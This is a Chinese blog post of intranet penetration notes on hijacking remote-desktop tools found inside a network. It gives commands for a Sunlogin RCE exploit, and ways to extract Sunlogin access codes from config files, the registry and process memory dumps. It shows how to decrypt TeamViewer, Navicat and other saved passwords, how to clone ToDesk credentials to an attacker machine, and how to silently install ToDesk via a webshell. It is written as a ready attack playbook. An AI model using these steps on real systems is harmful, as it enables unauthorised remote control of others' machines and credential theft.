Featured image of post 内网远控工具利用思路
内网安全 学习笔记

内网远控工具利用思路

内网远控工具利用思路

内网渗透|内网远程控制总结

1.向日葵

https://mp.weixin.qq.com/s/yfKpdPaDl0XwoZWLdY4S8Q

在一些内网实战中,有可能存在向日葵远控软件,使用进程杀软识别可以识别出向日葵的进程。

向日葵使用伙伴识别码和验证码就可以直接远程控制,设备的识别码和验证码都保存在本地配置文件中。

影响版本:向日葵个人版for Windows= 11.0.0.33 向日葵简约版= V1.0.1.43315(2021.12) 测试客户端漏洞版本:11.0.0.33162

查看是否存在向日葵进程

1
2
3

tasklist |findstr "Sunlogin"    

SunloginClient.exe就是向日葵进程信息

1.1.向日葵RCE

受影响版本向日葵下载地址:http://www.kkx.net/soft/42661.html

https://github.com/Mr-xn/sunlogin_rce

1
2
3

.\xrkRce.exe -h 192.168.0.100 -t scan

xrkRce.exe -h 192.168.0.100 -t rce -p 53123 -c "whoami"  //执行命令

1.2.内网向日葵<12.5通杀思路

窃取配置文件来进行解密(只针对低版本向日葵具体版本号未知)

低版本的向日葵把密码和机器码加密写入到了配置文件中,我们可以把配置文件down到自己的机器上,然后进行重开向日葵即可。这里向日葵版本较低,就不进行测试

在12.5.2之前的某些版本可以写到了注册表中,所以可以使用注册表来进行查询 

1
2
3
4
5
6

向日葵默认配置文件路径:    
安装版C:\\\\Program Files\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\config.ini    
便携版C:\\\\ProgramData\\\\Oray\\\\SunloginClient\\\\config.ini    
本机验证码参数encry\\\_pwd    
本机识别码参数fastcode(去掉开头字母)    
sunlogincode判断用户是否登录状态

解密脚本:https://github.com/wafinfo/Sunflower_get_Password?ref=pythonrepo.com

如果配置文件中不存在密文,那么可能存放在注册表中

1
2
3

安装版reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo

便携版绿色版):reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

最新版本

首先找到向日葵用户进程,然后使用**<font style="color:rgb(53, 148, 247);background-color:rgba(59, 170, 250, 0.1);">procdump</font>**等工具转储进程内存。

1
2

tasklist /v | findstr /i sunlogin
procdump64.exe -accepteula -ma 进程号

使用Winhex打开转储文件,按下Ctrl+Alt+X快捷键打开十六进制值搜索功能,搜索十六进制值66617374636F646522203A20226b,即可找到本机识别码。

搜索十六进制值000000000000003C6620663D79616865692E626F6C642E323420633D 636F6C6F725F65646974203E,使用F3快捷键可以跳到下一个匹配处,多跳2次即可找到本机验证码。

2.TeamViewer

查看进程中是否存在TeamViewer

1

tasklist |findstr "TeamViewer"

利用工具:https://github.com/uknowsec/SharpDecryptPwd

1

SharpDecryptPWD.exe -TeamViewer

Teamviewer版本高于版本为15.18.5无法正常利用

3.Todesk

这里还是和前面的向日葵一样,可以进行配置文件的窃取,默认安装路径C:\Program Files\ToDesk\config.ini

1
2

//获取todesk安装路径
wmic process where name="ToDesk.exe" get processid,executablepath,name

这里咱们可以攻击机安装todesk,然后读取到config.ini中的配置文件,然后和攻击机进行替换即可。

这里我虚拟机假装是受害机,读取出来,然后攻击机把tempauthpassex进行替换。

当服务器未安装todesk时,我们也可以上传todesk安装包,通过webshell进行静默安装

1

Todesk.exe  /S

接下载的思路也是将靶机的tempAuthPassEX复制到攻击机config.ini,重启todesk

4.AnyDesk

AnyDesk在国外常用

查看主机是否存在AnyDesk

1

tasklist |findstr "Anydesk.exe"

1
2

AnyDesk默认安装路径:
C:\\Users\\用户名\\AppData\\Roaming\\AnyDesk

5.gotohttp

6.内网密码收集工具

https://github.com/uknowsec/SharpDecryptPwd

https://github.com/RowTeam/SharpDecryptPwd

6.1.SharpDecryptPwd 

1
2
3
4
5

Usage: SharpDecryptPwd.exe -NavicatCrypto
       SharpDecryptPwd.exe -TeamViewer
       SharpDecryptPwd.exe -FileZilla
       SharpDecryptPwd.exe -WinSCP
       SharpDecryptPwd.exe -Xmangager -p Session_Path

1

SharpDecryptPwd.exe -NavicatCrypto      //解密Navicat密码


1

SharpDecryptPwd.exe -TeamViewer      //解密TeamViewer
By Lsec
最后更新于 Jun 17, 2025 22:24 +0800
comments powered by Disqus
© 2025 - 2026 Lsec's Blog
使用 Hugo 构建
主题 StackJimmy 设计
¹鵵ҳ